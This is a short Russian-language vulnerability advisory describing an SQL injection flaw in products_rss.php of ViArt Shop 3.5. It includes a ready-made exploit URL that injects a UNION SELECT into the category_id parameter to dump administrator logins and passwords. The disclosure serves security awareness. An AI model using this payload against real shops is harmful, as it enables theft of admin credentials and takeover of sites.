Программа: ViArt Shop 3.5

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием products_rss.php. Удаленный пользователь
может с помощью специально сформированного запроса выполнить произвольные SQL
команды в базе данных приложения.

Эксплоит:

/products_rss.php?category_id=1' UNION SELECT concat(login,char(58),password),0
FROM va_admins -- /*

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии